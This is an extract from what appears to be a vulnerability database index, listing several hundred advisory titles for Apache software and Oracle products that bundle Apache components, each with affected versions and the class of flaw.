3575| [128709] Apache Karaf up to 4.1.6/4.2.1 Features Deployer XMLInputFactory XML External Entity
3576| [128575] Apache NetBeans 9.0 Proxy Auto-Config Code Execution
3577| [128369] Apache Tika 1.8-1.19.1 SQLite3Parser Loop sql injection
3578| [128111] Apache NiFi 1.8.0 Template Upload Man-in-the-Middle cross site request forgery
3579| [128110] Apache NiFi 1.8.0 Cluster Request privilege escalation
3580| [128109] Apache NiFi 1.8.0 Error Page message-page.jsp Request Header cross site scripting
3581| [128108] Apache NiFi up to 1.7.x X-Frame-Options Header privilege escalation
3582| [128102] Apache Oozie up to 5.0.0 Workflow XML Impersonation spoofing
3583| [127994] WordPress up to 5.0.0 on Apache httpd MIME Restriction cross site scripting
3584| [127981] Apache OFBiz 16.11.01/16.11.02/16.11.03/16.11.04 HTTP Engine httpService GET Request privilege escalation
3585| [127161] Apache Hadoop 2.7.4/2.7.5/2.7.6 Incomplete Fix CVE-2016-6811 privilege escalation
3586| [127040] Loadbalancer.org Enterprise VA MAX up to 8.3.2 Apache HTTP Server Log cross site scripting
3587| [127007] Apache Spark Request Code Execution
3588| [126791] Apache Hadoop up to 0.23.11/2.7.6/2.8.4/2.9.1/3.0.2 ZIP File unknown vulnerability
3589| [126767] Apache Qpid Proton-J Transport 0.3 Certificate Verification Man-in-the-Middle weak authentication
3590| [126896] Apache Commons FileUpload 1.3.3 on LDAP Manager DiskFileItem File privilege escalation
3591| [126574] Apache Hive up to 2.3.3/3.1.0 Query privilege escalation
3592| [126573] Apache Hive up to 2.3.3/3.1.0 HiveServer2 privilege escalation
3593| [126564] Apache Superset up to 0.22 Pickle Library load Code Execution
3594| [126488] Apache Syncope up to 2.0.10/2.1.1 BPMN Definition xxe privilege escalation
3595| [126487] Apache Syncope up to 2.0.10/2.1.1 cross site scripting
3596| [126346] Apache Tomcat Path privilege escalation
3597| [125922] Apache Impala up to 3.0.0 ALTER privilege escalation
3598| [125921] Apache Impala up to 3.0.0 Queue Injection privilege escalation
3599| [125647] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Install (Apache Tomcat) information disclosure
3600| [125617] Oracle Retail Returns Management 14.1 Apache Batik unknown vulnerability
3601| [125616] Oracle Retail Point-of-Service 13.4/14.0/14.1 Apache Batik unknown vulnerability
3602| [125614] Oracle Retail Central Office 14.1 Apache Batik unknown vulnerability
3603| [125613] Oracle Retail Back Office 13.3/13.4/14/14.1 Apache Batik unknown vulnerability
3604| [125599] Oracle Retail Open Commerce Platform 5.3.0/6.0.0/6.0.1 Apache Log4j unknown vulnerability
3605| [125569] Oracle PeopleSoft Enterprise PeopleTools 8.55/8.56 Apache HTTP Server information disclosure
3606| [125494] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat information disclosure
3607| [125447] Oracle Business Intelligence Enterprise Edition 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Batik unknown vulnerability
3608| [125428] Oracle Identity Management Suite 11.1.2.3.0/12.2.1.3.0 Apache Log4j unknown vulnerability
3609| [125427] Oracle Identity Analytics 11.1.1.5.8 Apache Log4j unknown vulnerability
3610| [125424] Oracle API Gateway 11.1.2.4.0 Apache Log4j unknown vulnerability
3611| [125423] Oracle BI Publisher 11.1.1.7.0/11.1.1.9.0/12.2.1.3.0/12.2.1.4.0 Apache Log4j unknown vulnerability
3612| [125383] Oracle up to 10.2.0 Apache Trinidad unknown vulnerability
3613| [125379] Oracle up to 10.1.x Apache Struts 1 cross site scripting
3614| [125377] Oracle up to 10.2.0 Apache Commons Collections unknown vulnerability
3615| [125376] Oracle Communications Application Session Controller up to 3.7.0 Apache Commons Collections unknown vulnerability
3616| [125375] Oracle Communications User Data Repository up to 12.1.x Apache Xerces memory corruption
3617| [125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp Parameter cross site scripting
3618| [125133] Apache Tika up to 1.19 XML Parser reset() denial of service
3619| [124877] Apache PDFbox up to 2.0.11 PDF File denial of service
3620| [124876] Apache Ranger up to 1.1.x UnixAuthenticationService Stack-based memory corruption
3621| [124791] Apache Tomcat up to 7.0.90/8.5.33/9.0.11 URL Open Redirect
3622| [124787] Apache Pony Mail 0.7/0.8/0.9 Statistics Generator Timestamp Data information disclosure
3623| [124447] Apache HTTP Server up to 2.4.34 SETTINGS Frame denial of service
3624| [124346] Apache Mesos pre-1.4.2/1.5.0/1.5.1/1.6.0 on Executor HTTP API String Comparison validation JSON Web Token information disclosure
3625| [124286] Apache Tika up to 1.18 IptcAnpaParser Loop denial of service
3626| [124242] Apache Tika up to 0.18 C:/evil.bat" Directory unknown vulnerability
3627| [124241] Apache Tika up to 0.18 XML Parser Entity Expansion denial of service
3628| [124191] Apache Karaf up to 3.0.8/4.0.8/4.1.0 WebConsole .../gogo/ weak authentication
3629| [124190] Apache Karaf up to 4.1.x sshd privilege escalation
3630| [124152] Apache Camel Mail up to 2.22.0 Path directory traversal
3631| [124143] Apache SpamAssassin up to 3.4.1 PDFInfo Plugin Code Execution
3632| [124134] Apache SpamAssassin up to 3.4.1 Scan Engine HTML::Parser Email denial of service
3633| [124095] PHP up to 5.6.37/7.0.31/7.1.21/7.2.9 Apache2 sapi_apache2.c php_handler cross site scripting
3634| [124024] Apache Mesos 1.4.x/1.5.0 libprocess JSON Payload denial of service
3635| [123814] Apache ActiveMQ Client up to 5.15.5 TLS Hostname Verification Man-in-the-Middle weak authentication
3636| [123393] Apache Traffic Server up to 6.2.2/7.1.3 ESI Plugin Config privilege escalation
3637| [123392] Apache Traffic Server 6.2.2 TLS Handshake Segmentation Fault denial of service
3638| [123391] Apache Traffic Server up to 6.2.2/7.1.3 Range Request Performance denial of service
3639| [123390] Apache Traffic Server up to 6.2.2/7.1.3 Request HTTP Smuggling privilege escalation
3640| [123369] Apache Traffic Server up to 6.2.2/7.1.3 ACL remap.config Request denial of service
3641| [123197] Apache Sentry up to 2.0.0 privilege escalation
3642| [123145] Apache Struts up to 2.3.34/2.5.16 Namespace Code Execution
3643| [123144] Apache Cayenne up to 4.1.M1 CayenneModeler XML File File Transfer privilege escalation
3644| [122981] Apache Commons Compress 1.7 ZipArchiveInputStream ZIP Archive denial of service
3645| [122889] Apache HTTP Server up to 2.2.31/2.4.23 mod_userdir HTTP Response Splitting privilege escalation
3646| [122800] Apache Spark 1.3.0 REST API weak authentication
3647| [122642] Apache Airflow up to 1.8.x 404 Page Reflected cross site scripting
3648| [122568] Apache Tomcat up to 8.5.31/9.0.9 Connection Reuse weak authentication
3649| [122567] Apache Axis 1.0./1.1/1.2/1.3/1.4 cross site scripting
3650| [122556] Apache Tomcat up to 7.0.86/8.0.51/8.5.30/9.0.7 UTF-8 Decoder Loop denial of service
3651| [122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client unknown vulnerability
3652| [122456] Apache Camel up to 2.20.3/2.21.0 XSD Validator XML External Entity
3653| [122455] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Revoked Certificate weak authentication
3654| [122454] Apache Tomcat Native up to 1.1.34/1.2.16 OSCP Responder Revoked Certificate weak authentication
3655| [122214] Apache Kafka up to 0.9.0.1/0.10.2.1/0.11.0.2/1.0.0 Broker Request Data Loss denial of service
3656| [122202] Apache Kafka up to 0.10.2.1/0.11.0.1 SASL Impersonation spoofing
3657| [122101] Docker Skeleton Runtime for Apache OpenWhisk Docker Action dockerskeleton:1.3.0 privilege escalation
3658| [122100] PHP Runtime for Apache OpenWhisk Docker Action action-php-v7.2:1.0.0 privilege escalation
3659| [122012] Apache Ignite up to 2.5 Serialization privilege escalation
3660| [121911] Apache Ambari up to 2.5.x/2.6.2 Log Message Credentials information disclosure
3661| [121910] Apache HTTP Server 2.4.33 mod_md HTTP Requests denial of service
3662| [121854] Oracle Tape Library ACSLS up to ACSLS 8.4.0-2 Apache Commons Collections unknown vulnerability
3663| [121752] Oracle Insurance Policy Administration 10.0/10.1/10.2/11.0 Apache Log4j unknown vulnerability
3664| [121370] Apache Spark up to 2.1.2/2.2.1/2.3.0 URL cross site scripting
3665| [121354] Apache CouchDB HTTP API Code Execution
3666| [121144] Apache LDAP API up to 1.0.1 SSL Filter information disclosure
3667| [121143] Apache Storm up to 0.10.2/1.0.6/1.1.2/1.2.1 Cluster privilege escalation
3668| [120436] Apache CXF Fediz up to 1.4.3 Application Plugin unknown vulnerability
3669| [120310] Apache PDFbox up to 1.8.14/2.0.10 AFMParser Loop denial of service
3670| [120168] Apache CXF weak authentication
3671| [120080] Apache Cassandra up to 3.11.1 JMX/RMI Interface RMI Request privilege escalation
3672| [120043] Apache HBase up to 1.2.6.0/1.3.2.0/1.4.4/2.0.0 Thrift 1 API Server weak authentication
3673| [119723] Apache Qpid Broker-J 7.0.0/7.0.1/7.0.2/7.0.3/7.0.4 AMQP Messages Crash denial of service
3674| [122569] Apache HTTP Server up to 2.4.33 HTTP2 Request denial of service
3675| [119486] Apache Geode up to 1.4.0 Security Manager Code Execution
3676| [119306] Apache MXNet Network Interface privilege escalation
3677| [118999] Apache Storm up to 1.0.6/1.1.2/1.2.1 Archive directory traversal
3678| [118996] Apache Storm up to 1.0.6/1.1.2/1.2.1 Daemon spoofing
3679| [118644] Apple macOS up to 10.13.5 apache_mod_php unknown vulnerability
3680| [118200] Apache Batik up to 1.9 Deserialization unknown vulnerability
3681| [118143] Apache NiFi activemq-client Library Deserialization denial of service
3682| [118142] Apache NiFi 1.6.0 SplitXML xxe privilege escalation
3683| [118051] Apache Zookeeper up to 3.4.9/3.5.3-beta weak authentication
3684| [117997] Apache ORC up to 1.4.3 ORC File Recursion denial of service
3685| [117825] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.8 CORS Filter privilege escalation
3686| [117405] Apache Derby up to 10.14.1.0 Network Server Network Packet privilege escalation
3687| [117347] Apache Ambari up to 2.6.1 HTTP Request directory traversal
3688| [117265] LibreOffice/Apache Office Writer SMB Connection XML Document information disclosure
3689| [117143] Apache uimaj/uima-as/uimaFIT/uimaDUCC XML XXE information disclosure
3690| [117117] Apache Tika up to 1.17 ChmParser Loop denial of service
3691| [117116] Apache Tika up to 1.17 BPGParser Loop denial of service
3692| [117115] Apache Tika up to 1.17 tika-server command injection
3693| [116929] Apache Fineract getReportType Parameter privilege escalation
3694| [116928] Apache Fineract REST Endpoint Parameter privilege escalation
3695| [116927] Apache Fineract MakercheckersApiResource Parameter sql injection
3696| [116926] Apache Fineract REST Parameter privilege escalation
3697| [116574] Apache wicket-jquery-ui up to 6.29.0/7.10.1/8.0.0-M9.1 WYSIWYG Editor privilege escalation
3698| [116622] Oracle Enterprise Manager for MySQL Database 12.1.0.4 EM Plugin: General (Apache Tomcat) unknown vulnerability
3699| [115931] Apache Solr up to 6.6.2/7.2.1 XML Data Parameter XML External Entity
3700| [115883] Apache Hive up to 2.3.2 privilege escalation
3701| [115882] Apache Hive up to 2.3.2 xpath_short information disclosure
3702| [115881] Apache DriverHive JDBC Driver up to 2.3.2 Escape Argument Bypass privilege escalation
3703| [115518] Apache Ignite 2.3 Deserialization privilege escalation
3704| [115260] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache cross site scripting
3705| [115259] EMC RSA Authentication Agent for Web up to 8.0.1 on IIS/Apache Cookie Stack-based memory corruption
3706| [115500] CA Workload Control Center up to r11.4 SP5 Apache MyFaces Component Code Execution
3707| [115121] Apache Struts REST Plugin up to 2.5.15 Xstream XML Data denial of service
3708| [115061] Apache HTTP Server up to 2.4.29 HTTP Digest Authentication Challenge HTTP Requests Replay privilege escalation
3709| [115060] Apache HTTP Server up to 2.4.29 mod_cache_socache Request Header Crash denial of service
3710| [115059] Apache HTTP Server up to 2.4.29 HTTP2 NULL Pointer Dereference denial of service
3711| [115058] Apache HTTP Server up to 2.4.29 HTTP Header Crash denial of service
3712| [115057] Apache HTTP Server up to 2.4.29 mod_session Variable Name Cache privilege escalation
3713| [115039] Apache HTTP Server up to 2.4.29 FilesMatch File Upload privilege escalation
3714| [115038] Apache HTTP Server up to 2.0.65/2.2.34/2.4.29 mod_authnz_ldap Crash denial of service
3715| [114817] Apache Syncope up to 1.2.10/2.0.7 Search Parameter information disclosure
3716| [114816] Apache Syncope up to 1.2.10/2.0.7 XSLT Code Execution
3717| [114717] Apache Commons 1.11/1.12/1.13/1.14/1.15 ZIP Archive ZipFile/ZipArchiveInputStream denial of service
3718| [114661] Apache Allura up to 1.8.0 HTTP Response Splitting privilege escalation
3719| [114400] Apache Tomcat JK ISAPI Connector up to 1.2.42 IIS/ISAPI privilege escalation
3720| [114258] Apache HTTP Server up to 2.4.22 mod_cluster Segmentation Fault denial of service
3721| [114086] Apache ODE 1.3.3 ODE Process Deployment Web Service directory traversal
3722| [113955] Apache Xerces-C up to 3.2.0 XML Parser NULL Pointer Dereference denial of service
3723| [113945] Apache Tomcat up to 7.0.84/8.0.49/8.5.27/9.0.4 URL Pattern Empty String privilege escalation
3724| [113944] Apache OpenMeetings up to 3.x/4.0.1 CRUD Operation denial of service
3725| [113905] Apache Traffic Server up to 5.2.x/5.3.2/6.2.0/7.0.0 TLS Handshake Core Dump denial of service
3726| [113904] Apache Traffic Server up to 6.2.0 Host Header privilege escalation
3727| [113895] Apache Geode up to 1.3.x Code Execution
3728| [113894] Apache Geode up to 1.3.x TcpServer Code Execution
3729| [113888] Apache James Hupa WebMail 0.0.2 cross site scripting
3730| [113813] Apache Geode Cluster up to 1.3.x Secure Mode privilege escalation
3731| [113747] Apache Tomcat Servlets privilege escalation
3732| [113647] Apache Qpid up to 0.30 qpidd Broker AMQP Message Crash denial of service
3733| [113645] Apache VCL up to 2.1/2.2.1/2.3.1 Web GUI/XMLRPC API privilege escalation
3734| [113560] Apache jUDDI Console 3.0.0 Log Entries spoofing
3735| [113571] Apache Oozie up to 4.3.0/5.0.0-beta1 XML Data XML File privilege escalation
3736| [113569] Apache Karaf up to 4.0.7 LDAPLoginModule LDAP injection denial of service
3737| [113273] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
3738| [113198] Apache Qpid Dispatch Router 0.7.0/0.8.0 AMQP denial of service
3739| [113186] Apache JMeter 2.x/3.x Distributed Test Only privilege escalation
3740| [113145] Apache Thrift up to 0.9.3 Go Client Library privilege escalation
3741| [113106] Apache jUDDI up to 3.3.3 XML Data WADL2Java/WSDL2Java XML Document privilege escalation
3742| [113105] Apache Qpid Broker-J 7.0.0 AMQP Crash denial of service
3743| [112885] Apache Allura up to 1.8.0 File information disclosure
3744| [112856] Apache CloudStack up to 4.8.1.0/4.9.0.0 API weak authentication
3745| [112855] Apache CloudStack 4.1.0/4.1.1 API information disclosure
3746| [112678] Apache Tomcat up to 7.0.82/8.0.47/8.5.23/9.0.1 Bug Fix 61201 privilege escalation
3747| [112677] Apache Tomcat Native Connector up to 1.1.34/1.2.14 OCSP Checker Client weak authentication
3748| [112625] Apache POI up to 3.16 Loop denial of service
3749| [112448] Apache NiFi up to 1.3.x Deserialization privilege escalation
3750| [112396] Apache Hadoop 2.7.3/2.7.4 YARN NodeManager Credentials information disclosure
3751| [112339] Apache NiFi 1.5.0 Header privilege escalation
3752| [112330] Apache NiFi 1.5.0 Header HTTP Request privilege escalation
3753| [112314] NetGain Enterprise Manager 7.2.730 Build 1034 org.apache.jsp.u.jsp.tools.exec_jsp Servlet Parameter privilege escalation
3754| [112253] Apache Hadoop up to 0.23.x/2.7.4/2.8.2 MapReduce Job History Server Configuration File privilege escalation
3755| [112171] Oracle Secure Global Desktop 5.3 Apache Log4j privilege escalation
3756| [112164] Oracle Agile PLM 9.3.5/9.3.6 Apache Tomcat unknown vulnerability
3757| [112161] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Tomcat privilege escalation
3758| [112158] Oracle Autovue for Agile Product Lifecycle Management 21.0.0/21.0.1 Apache Log4j privilege escalation
3759| [112156] Oracle Agile PLM 9.3.3/9.3.4/9.3.5/9.3.6 Apache Log4j privilege escalation
3760| [112155] Oracle Agile Engineering Data Management 6.1.3/6.2.0/6.2.1 Apache Log4j privilege escalation
3761| [112137] Oracle MICROS Relate CRM Software 10.8.x/11.4.x/15.0.x, Apache Tomcat unknown vulnerability
3762| [112136] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat privilege escalation
3763| [112133] Oracle Retail Workforce Management 1.60.7/1.64.0 Apache Log4j privilege escalation
3764| [112129] Oracle Retail Assortment Planning 14.1.3/15.0.3/16.0.1 Apache Log4j privilege escalation
3765| [112114] Oracle 9.1 Apache Log4j privilege escalation
3766| [112113] Oracle 9.1 Apache Log4j privilege escalation
3767| [112045] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat privilege escalation
3768| [112038] Oracle Health Sciences Empirica Inspections 1.0.1.1 Apache Tomcat information disclosure
3769| [112019] Oracle Endeca Information Discovery Integrator 3.1.0/3.2.0 Apache Tomcat privilege escalation
3770| [112017] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.2.0/12.2.1.3.0 Apache Struts 1 cross site scripting
3771| [112011] Oracle Identity Manager 11.1.2.3.0 Apache Commons Collections privilege escalation
3772| [111950] Oracle Database 12.2.0.1 Apache Tomcat information disclosure
3773| [111703] Apache Sling XSS Protection API 1.0.4 URL Encoding cross site scripting
3774| [111556] Apache Geode up to 1.2.x Secure Mode Parameter OQL privilege escalation
3775| [111555] Apache Geode up to 1.2.x Secure Mode OQL privilege escalation
3776| [111540] Apache Geode up to 1.2.x Secure Mode information disclosure
3777| [111519] Apache Sling JCR ContentLoader 2.1.4 xmlreader directory traversal
3778| [111338] Apache DeltaSpike-JSF 1.8.0 cross site scripting
3779| [111330] Apache OFBiz 16.11.01/16.11.02/16.11.03 BIRT Plugin cross site scripting
3780| [110789] Apache Sling up to 1.4.0 Authentication Service Credentials information disclosure
3781| [110785] Apache Drill up to 1.11.0 Query Page unknown vulnerability
3782| [110701] Apache Fineract Query Parameter sql injection
3783| [110484] Apache Synapse up to 3.0.0 Apache Commons Collections Serialized Object Code Injection privilege escalation
3784| [110426] Adobe Experience Manager 6.0/6.1/6.2/6.3 Apache Sling Servlets Post cross site scripting
3785| [110141] Apache Struts up to 2.5.14 REST Plugin denial of service
3786| [110140] Apache Qpid Broker-J up to 0.32 privilege escalation
3787| [110139] Apache Qpid Broker-J up to 6.1.4 AMQP Frame denial of service
3788| [110106] Apache CXF Fediz Spring cross site request forgery
3789| [109766] Apache OpenOffice up to 4.1.3 DOC File Parser WW8Fonts memory corruption
3790| [109750] Apache OpenOffice up to 4.1.3 DOC File Parser ImportOldFormatStyles memory corruption
3791| [109749] Apache OpenOffice up to 4.1.3 PPT File Parser PPTStyleSheet memory corruption
3792| [109606] October CMS Build 412 Apache Configuration File Upload privilege escalation
3793| [109419] Apache Camel up to 2.19.3/2.20.0 camel-castor Java Object Deserialization privilege escalation
3794| [109418] Apache Camel up to 2.19.3/2.20.0 camel-hessian Java Object Deserialization privilege escalation
3795| [109400] Apache CouchDB up to 1.6.x/2.1.0 Database Server Shell privilege escalation
3796| [109399] Apache CouchDB up to 1.6.x/2.1.0 JSON Parser Shell privilege escalation
3797| [109398] Apache CXF 3.1.14/3.2.1 JAX-WS/JAX-RS Attachment denial of service
3798| [108872] Apache Hive up to 2.1.1/2.2.0/2.3.0 Policy Enforcement privilege escalation
3799| [108939] Apple macOS up to 10.13.1 apache unknown vulnerability
3800| [108938] Apple macOS up to 10.13.1 apache denial of service
3801| [108937] Apple macOS up to 10.13.1 apache unknown vulnerability
3802| [108936] Apple macOS up to 10.13.1 apache unknown vulnerability
3803| [108935] Apple macOS up to 10.13.1 apache denial of service
3804| [108934] Apple macOS up to 10.13.1 apache unknown vulnerability
3805| [108933] Apple macOS up to 10.13.1 apache unknown vulnerability
3806| [108932] Apple macOS up to 10.13.1 apache unknown vulnerability
3807| [108931] Apple macOS up to 10.13.1 apache denial of service
3808| [108930] Apple macOS up to 10.13.1 apache unknown vulnerability
3809| [108929] Apple macOS up to 10.13.1 apache denial of service
3810| [108928] Apple macOS up to 10.13.1 apache unknown vulnerability
3811| [108797] Apache Struts up to 2.3.19 TextParseUtiltranslateVariables OGNL Expression privilege escalation
3812| [108795] Apache Traffic Server up to 5.3.0 HTTP2 set_dynamic_table_size memory corruption
3813| [108794] Apache WSS4J up to 1.6.16/2.0.1 Incomplete Fix Leak information disclosure
3814| [108793] Apache Qpid up to 0.30 qpidd Crash denial of service
3815| [108792] Apache Traffic Server up to 5.1.0 Access Restriction privilege escalation
3816| [108791] Apache Wicket up to 1.5.11/6.16.x/7.0.0-M2 Session information disclosure
3817| [108790] Apache Storm 0.9.0.1 Log Viewer directory traversal
3818| [108789] Apache Cordova In-App-Browser Standalone Plugin up to 0.3.1 on iOS CDVInAppBrowser privilege escalation
3819| [108788] Apache Cordova File-Transfer Standalone Plugin up to 0.4.1 on iOS ios/CDVFileTransfer.m spoofing
3820| [108787] Apache HttpClient up to 4.3.0 HttpClientBuilder.java unknown vulnerability
3821| [108786] Apache Wicket up to 1.4.21/1.5.9/6.3.x script Tag cross site scripting
3822| [108783] Apache Hadoop up to 0.23.3/1.0.3/2.0.1 Kerberos Security Feature Key weak encryption
3823| [108782] Apache Xerces2 XML Service denial of service
3824| [108781] Apache jUDDI up to 1.x happyjuddi.jsp Parameter cross site scripting
3825| [108780] Apache jUDDI up to 1.x Log File uddiget.jsp spoofing
3826| [108709] Apache Cordova Android up to 3.7.1/4.0.1 intent URL privilege escalation
3827| [108708] Apache ActiveMQ up to 5.10.0 XML Data XML External Entity
3828| [108707] Apache ActiveMQ up to 1.7.0 XML Data XML External Entity
3829| [108629] Apache OFBiz up to 10.04.01 privilege escalation
3830| [108543] Apache Derby 10.1.2.1/10.2.2.0/10.3.1.4/10.4.1.3 Export File privilege escalation
3831| [108312] Apache HTTP Server on RHEL IP Address Filter privilege escalation
3832| [108297] Apache NiFi up to 0.7.1/1.1.1 Proxy Chain Username Deserialization privilege escalation
3833| [108296] Apache NiFi up to 0.7.1/1.1.1 Cluster Request privilege escalation
3834| [108250] Oracle Secure Global Desktop 5.3 Apache HTTP Server memory corruption
3835| [108245] Oracle Transportation Management up to 6.3.7 Apache Tomcat unknown vulnerability
3836| [108244] Oracle Transportation Management 6.4.1/6.4.2 Apache Commons FileUpload denial of service
3837| [108243] Oracle Agile Engineering Data Management 6.1.3/6.2.0 Apache Commons Collections memory corruption
3838| [108222] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Batik denial of service
3839| [108219] Oracle MICROS Retail XBRi Loss Prevention up to 10.8.1 Apache Tomcat unknown vulnerability
3840| [108217] Oracle Retail Store Inventory Management 13.2.9/14.0.4/14.1.3/15.0.1/16.0.1 Apache Groovy unknown vulnerability
3841| [108216] Oracle Retail Convenience and Fuel POS Software 2.1.132 Apache Groovy unknown vulnerability
3842| [108169] Oracle MySQL Enterprise Monitor up to 3.2.8.2223/3.3.4.3247/3.4.2.4181 Apache Tomcat unknown vulnerability
3843| [108113] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Batik denial of service
3844| [108107] Oracle Hospitality Guest Access 4.2.0/4.2.1 Apache Tomcat unknown vulnerability
3845| [108102] Oracle Healthcare Master Person Index 4.x Apache Groovy unknown vulnerability
3846| [108085] Oracle Identity Manager 11.1.2.3.0 Apache Struts 1 memory corruption
3847| [108083] Oracle API Gateway 11.1.2.4.0 Apache Batik denial of service
3848| [108080] Oracle GlassFish Server 3.1.2 Apache Commons FileUpload denial of service
3849| [108066] Oracle Management Pack for GoldenGate 11.2.1.0.12 Apache Tomcat memory corruption
3850| [108062] Oracle BI Publisher 11.1.1.7.0/12.2.1.1.0/12.2.1.2.0 Apache ActiveMQ memory corruption
3851| [108060] Oracle Enterprise Manager Ops Center 12.2.2/12.3.2 Apache Groovy unknown vulnerability
3852| [108033] Oracle Primavera Unifier 9.13/9.14/10.x/15.x/16.x, Apache Groovy unknown vulnerability
3853| [108013] Oracle Communications WebRTC Session Controller 7.0/7.1/7.2 Apache Groovy unknown vulnerability
3854| [108011] Oracle Communications Services Gatekeeper 5.1/6.0 Apache Trinidad unknown vulnerability
3855| [107904] Apache Struts up to 2.3.28 Double OGNL Evaluation privilege escalation
3856| [107860] Apache Solr up to 7.0 Apache Lucene RunExecutableListener XML External Entity
3857| [107834] Apache Ranger up to 0.6.1 Change Password privilege escalation
3858| [107639] Apache NiFi 1.4.0 XML External Entity
3859| [107606] Apache ZooKeeper up to 3.4.9/3.5.2 Command CPU Exhaustion denial of service
3860| [107597] Apache Roller up to 5.0.2 XML-RPC Protocol Support XML External Entity
3861| [107429] Apache Impala up to 2.9.x Kudu Table privilege escalation
3862| [107411] Apache Tomcat up to 7.0.81/8.0.46/8.5.22/9.0.0 JSP File File Upload privilege escalation
3863| [107385] Apache Geode up to 1.2.0 Secure Mode privilege escalation
3864| [107339] Apache OpenNLP up to 1.5.3/1.6.0/1.7.2/1.8.1 XML Data XML External Entity
3865| [107333] Apache Wicket up to 8.0.0-M1 CSRF Prevention HTTP Header privilege escalation
3866| [107323] Apache Wicket 1.5.10/6.13.0 Class Request information disclosure
3867| [107310] Apache Geode up to 1.2.0 Command Line Utility Query privilege escalation
3868| [107276] ArcSight ESM/ArcSight ESM Express up to 6.9.1c Patch 3/6.11.0 Apache Tomcat Version information disclosure
3869| [107266] Apache Tika up to 1.12 XML Parser XML External Entity
3870| [107262] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
3871| [107258] Apache Mesos up to 1.1.2/1.2.1/1.3.0/1.4.0-dev libprocess HTTP Request Crash denial of service
3872| [107197] Apache Xerces Jelly Parser XML File XML External Entity
3873| [107193] ZTE NR8950 Apache Commons Collections RMI Request Deserialization privilege escalation
3874| [107084] Apache Struts up to 2.3.19 cross site scripting
3875| [106877] Apache Struts up to 2.0.33/2.5.10 Freemarker Tag privilege escalation
3876| [106875] Apache Struts up to 2.5.5 URL Validator denial of service
3877| [106874] Apache Struts up to 2.3.30 Convention Plugin directory traversal
3878| [106847] Apache Tomcat up to 7.0.80 VirtualDirContext Source information disclosure
3879| [106846] Apache Tomcat up to 7.0.79 on Windows HTTP PUT Method Parameter File Upload privilege escalation
3880| [106777] Apache HTTP Server up to 2.2.34/2.4.27 Limit Directive ap_limit_section HTTP Request information disclosure
3881| [106739] puppetlabs-apache up to 1.11.0/2.0.x weak authentication
3882| [106720] Apache Wicket up to 1.5.12/6.18.x/7.0.0-M4 CryptoMapper privilege escalation
3883| [106586] Apache Brooklyn up to 0.9.x REST Server cross site scripting
3884| [106562] Apache Spark up to 2.1.1 Launcher API Deserialization privilege escalation
3885| [106559] Apache Brooklyn up to 0.9.x SnakeYAML YAML Data Java privilege escalation
3886| [106558] Apache Brooklyn up to 0.9.x REST Server cross site request forgery
3887| [106556] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
3888| [106555] Apache Traffic Server up to 5.3.1 HTTP2 unknown vulnerability
3889| [106171] Apache Directory LDAP API up to 1.0.0-M30 Timing unknown vulnerability
3890| [106167] Apache Struts up to 2.5.12 REST Plugin XML Data privilege escalation
3891| [106166] Apache Struts up to 2.3.33/2.5.12 REST Plugin denial of service
3892| [106165] Apache Struts up to 2.3.33/2.5.12 URLValidator Regex CPU Exhaustion denial of service
3893| [106115] Apache Hadoop up to 2.6.4/2.7.2 YARN NodeManager Password information disclosure
3894| [106012] Apache Solr up to 5.5.3/6.4.0 Replication directory traversal
3895| [105980] Apache Engine 16.11.01 Parameter Reflected unknown vulnerability
3896| [105962] Apache Atlas 0.6.0/0.7.0 Frame cross site scripting
3897| [105961] Apache Atlas 0.6.0/0.7.0 Stack Trace information disclosure
3898| [105960] Apache Atlas 0.6.0/0.7.0 Search Reflected cross site scripting
3899| [105959] Apache Atlas 0.6.0/0.7.0 edit Tag DOM cross site scripting
3900| [105958] Apache Atlas 0.6.0/0.7.0 edit Tag Stored cross site scripting
3901| [105957] Apache Atlas 0.6.0/0.7.0 Cookie privilege escalation
3902| [105905] Apache Atlas 0.6.0/0.7.0/0.7.1 /js privilege escalation
3903| [105878] Apache Struts up to 2.3.24.0 privilege escalation
3904| [105682] Apache2Triad 1.5.4 phpsftpd/users.php Parameter cross site scripting
3905| [105681] Apache2Triad 1.5.4 phpsftpd/users.php Request cross site request forgery
3906| [105680] Apache2Triad 1.5.4 Parameter Session Fixation weak authentication
3907| [105643] Apache Pony Mail up to 0.8b weak authentication
3908| [105288] Apache Sling up to 2.3.21 Sling.evalString() String cross site scripting
3909| [105219] Apache Tomcat up to 8.5.15/9.0.0.M21 HTTP2 Bypass directory traversal
3910| [105218] Apache Tomcat up to 7.0.78/8.0.44/8.5.15/9.0.0.M21 CORS Filter Cache Poisoning privilege escalation
3911| [105215] Apache CXF up to 3.0.12/3.1.9 OAuth2 Hawk/JOSE MAC Validation Timing unknown vulnerability
3912| [105206] Apache CXF up to 3.0.11/3.1.8 JAX-RS Module XML External Entity
3913| [105205] Apache CXF up to 3.0.11/3.1.8 HTTP Transport Module Parameter cross site scripting
3914| [105202] Apache Storm 1.0.0/1.0.1/1.0.2/1.0.3/1.1.0 Worker privilege escalation
3915| [104987] Apache Xerces-C++ XML Service CPU Exhaustion denial of service
3916| [104986] Apache CXF 2.4.5/2.5.1 WS-SP UsernameToken Policy SOAP Request weak authentication
3917| [104985] Apache MyFaces Core up to 2.1.4 EL Expression Parameter Injection information disclosure
3918| [104983] Apache Wink up to 1.1.1 XML Document xxe privilege escalation
3919| [104981] Apache Commons Email 1.0/1.1/1.2/1.3/1.4 Subject Linebreak SMTP privilege escalation
3920| [104591] MEDHOST Document Management System Apache Solr Default Credentials weak authentication
